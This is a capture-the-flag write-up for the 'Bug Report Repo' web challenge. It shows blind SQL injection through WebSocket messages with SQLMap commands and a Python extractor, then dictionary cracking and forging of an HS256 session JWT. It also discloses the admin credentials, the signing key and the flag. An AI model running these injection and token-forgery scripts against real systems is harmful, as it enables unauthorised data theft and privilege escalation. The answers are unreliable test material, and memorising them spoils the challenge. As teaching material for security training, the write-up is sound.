Bug Report Repo
Writeup for Bug Report Repo (Web) - Intigriti 1337UP Live CTF (2023) 💜
I started my own bug bounty platform! The UI is in the early stages but we've already got plenty of submissions. I wonder why I keep getting emails about a "critical" vulnerability report though, I don't see it anywhere on the system 😕
Players can use Burp Repeater to tamper with the WebSocket messages; if they set the id to 11, they will find an extra name, ethical_hacker, that the UI does not list.
If they probe with a quote, they will see database errors and can quickly confirm boolean-based SQLi with the following two messages (the first returns the record, the second does not):
{"id":"1 AND 1=1"}
{"id":"1 AND 1=2"}
Using this, they will then need to dump the hidden row, either by filtering the injected condition on id, reported_by or severity.
Players can write their own script, or may find this 2021 writeup from Rayhan on running SQLMap against WebSockets through a small proxy script, but that script won't work here by default:
They need to change the ws:// protocol to wss:// for the remote instance
The DB is SQLite instead of MySQL; negative values in SQLMap's payloads will cause the script to freeze, so players need to add a timeout or logic to skip negative values
Launch the middleware script (sqlmap_proxy.py), then point SQLMap at it:
sqlmap -u "http://localhost:9999/?id=1" --batch --proxy=http://127.0.0.1:8080 -T bug_reports -C description --where id=11 --dump --threads 10
The hidden bug report is returned, which indicates there's an admin endpoint with weak creds
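For players who would rather write their own script than patch the SQLMap proxy, here is an added example (not the challenge's code and not Rayhan's proxy) of the blind extraction in Python. The server side is simulated with an in-memory SQLite table so it runs offline: the query shape (the JSON id pasted unquoted into a WHERE clause), the table columns and the row contents are assumptions and constructed sample data, and `send` is the only thing to swap for the real WebSocket connection.

```python
"""Blind boolean-based SQLi through the bug-tracker WebSocket, replayed offline.

Added example, not the challenge's own code and not Rayhan's sqlmap proxy. The
server is simulated with an in-memory SQLite database; the query shape is an
ASSUMPTION about the real app (the id from the JSON message pasted unquoted
into a WHERE clause), which is what the {"id":"1 AND 1=1"} / {"id":"1 AND 1=2"}
probes in the writeup suggest. Row contents below are constructed sample data.
"""
import json
import sqlite3
from typing import Callable

_db = sqlite3.connect(":memory:")
_db.executescript(
    """
    CREATE TABLE bug_reports(
        id INTEGER PRIMARY KEY, reported_by TEXT, severity TEXT, description TEXT);
    INSERT INTO bug_reports VALUES
        (1,  'alice',          'low',      'Constructed: XSS in profile page'),
        (2,  'bob',            'medium',   'Constructed: IDOR on invoices'),
        (11, 'ethical_hacker', 'critical', 'Constructed: admin panel with weak creds');
    """
)


def vulnerable_handler(message: str) -> str:
    """Simulated WebSocket handler: the id is string-formatted into SQL (the bug).

    Only reported_by comes back, so description has to be pulled out blind.
    """
    req = json.loads(message)
    query = f"SELECT reported_by FROM bug_reports WHERE id = {req['id']}"
    try:
        row = _db.execute(query).fetchone()
    except sqlite3.OperationalError as exc:      # what the quote probe triggers
        return json.dumps({"error": str(exc)})
    return json.dumps({"reported_by": row[0] if row else None})


Send = Callable[[str], str]   # one request message in, one reply message out


def oracle(send: Send, condition: str, row_id: int = 11) -> bool:
    """True iff `condition` holds for the row with id=row_id."""
    reply = json.loads(send(json.dumps({"id": f"{row_id} AND ({condition})"})))
    return reply.get("reported_by") is not None


def _search(send: Send, greater_than: Callable[[int], str], lo: int, hi: int, row_id: int) -> int:
    """Binary search: smallest v in [lo, hi] for which 'value > v' is false, i.e. the value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(send, greater_than(mid), row_id):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_column(send: Send, column: str, row_id: int = 11, max_len: int = 200) -> str:
    """Dump one text column of one row using only yes/no answers.

    length(), substr() and unicode() are SQLite built-ins, matching the
    writeup's note that the backend is SQLite rather than MySQL.
    """
    length = _search(send, lambda v: f"length({column}) > {v}", 0, max_len, row_id)
    chars = []
    for pos in range(1, length + 1):
        code = _search(send, lambda v: f"unicode(substr({column},{pos},1)) > {v}", 0, 127, row_id)
        chars.append(chr(code))
    return "".join(chars)


# Against the real target, `send` wraps the WebSocket instead of the simulated
# handler, e.g. with websocket-client (URL is a placeholder, wss:// for remote):
#   ws = websocket.create_connection("wss://<target>/<path>")
#   ws.settimeout(5)                     # don't hang forever on a dead query
#   send = lambda msg: (ws.send(msg), ws.recv())[1]
if __name__ == "__main__":
    print(vulnerable_handler('{"id":"11"}'))
    print(extract_column(vulnerable_handler, "description"))
```

The oracle only ever asks "did row 11 come back or not", so the same loop works whether you filter on id, reported_by or severity; just change the `row_id` part of the injected condition. The `settimeout` call is the script-side equivalent of the timeout the SQLMap proxy needs.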
Players visit /4dm1n_z0n3 and log in with crypt0:c4tz
They see a message saying the key is only viewable by the admin
Crack the session JWT (HS256) with hashcat, john, jwt_tool etc., finding the signing key catsarethebest (present in rockyou.txt); jwt_tool takes about 3 seconds:
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6ImNhdCJ9.HJxAqYHm9TG8PBmMScRGsAPcK5vymC6AS4brUyfH7VA -C -d /usr/share/wordlists/rockyou.txt
Forge a JWT with identity set to admin, e.g. with jwt_tool:
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6ImNhdCJ9.HJxAqYHm9TG8PBmMScRGsAPcK5vymC6AS4brUyfH7VA -S hs256 -p "catsarethebest" -I -pc identity -pv admin
Set the forged token as the session cookie and reload: the admin view now reveals the config key, which is the flag!
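The crack-and-forge step above, as an added Python example that uses only the standard library (this is not the challenge's code and not jwt_tool). PAGE_TOKEN is the token from the writeup and is only decoded, not cracked, here; DEMO_WORDLIST is a constructed stand-in for rockyou.txt and DEMO_TOKEN is minted locally with the key the writeup recovered, so the whole chain runs offline.

```python
"""HS256 JWT inspection, secret cracking and forgery with only the standard library.

Added example: not the challenge's code and not jwt_tool. PAGE_TOKEN is the
session token from the writeup; DEMO_WORDLIST is a constructed stand-in for
rockyou.txt, and DEMO_TOKEN is signed here with the key the writeup recovered
so the attack chain runs offline and deterministically.
"""
import base64
import binascii
import hashlib
import hmac
import json
from typing import Iterable, Optional, Tuple

PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJpZGVudGl0eSI6ImNhdCJ9."
              "HJxAqYHm9TG8PBmMScRGsAPcK5vymC6AS4brUyfH7VA")


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact(obj: dict) -> str:
    """JSON without whitespace, the usual JWT encoding."""
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Header and claims without checking the signature (recon only, never authz)."""
    header, payload, _sig = token.split(".")
    return json.loads(_b64url_decode(header)), json.loads(_b64url_decode(payload))


def sign_hs256(claims: dict, key: str) -> str:
    """Mint a compact HS256 JWT the way a Flask-style server would."""
    header = _compact({"alg": "HS256", "typ": "JWT"})
    signing_input = f"{header}.{_compact(claims)}"
    sig = hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def verify_hs256(token: str, key: str) -> Optional[dict]:
    """Claims if the HMAC checks out under `key`, else None."""
    try:
        header, payload, sig = token.split(".")
        given = _b64url_decode(sig)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(key.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, given):
        return None
    return json.loads(_b64url_decode(payload))


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: the token's own signature is the oracle,
    so nothing touches the server (jwt_tool's -C -d step)."""
    header, payload, sig = token.split(".")
    signing_input = f"{header}.{payload}".encode()
    target = _b64url_decode(sig)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        guess = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def forge(token: str, key: str, **new_claims) -> str:
    """Re-sign with modified claims (jwt_tool's -I -pc identity -pv admin)."""
    _header, claims = decode_unverified(token)
    claims.update(new_claims)
    return sign_hs256(claims, key)


# Constructed offline fixtures; a real run uses PAGE_TOKEN and rockyou.txt.
DEMO_KEY = "catsarethebest"
DEMO_WORDLIST = ["123456", "password", "iloveyou", "catsarethebest", "letmein"]
DEMO_TOKEN = sign_hs256({"identity": "cat"}, DEMO_KEY)

if __name__ == "__main__":
    print(decode_unverified(PAGE_TOKEN))
    key = crack_hs256(DEMO_TOKEN, DEMO_WORDLIST)
    print("key:", key)
    print("admin token:", forge(DEMO_TOKEN, key, identity="admin"))
```

Against the real challenge the step is `crack_hs256(PAGE_TOKEN, open("/usr/share/wordlists/rockyou.txt", encoding="latin-1"))`; if the writeup's token really was signed with catsarethebest, DEMO_TOKEN comes out byte-identical to PAGE_TOKEN, which is a quick sanity check before forging. The defensive takeaway is the mirror image: HS256 with a dictionary word as the secret is crackable offline in seconds, so use a long random key (or an asymmetric alg) and never derive authorization from unverified claims.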
Flag: INTIGRITI{w3b50ck37_5ql1_4nd_w34k_jw7}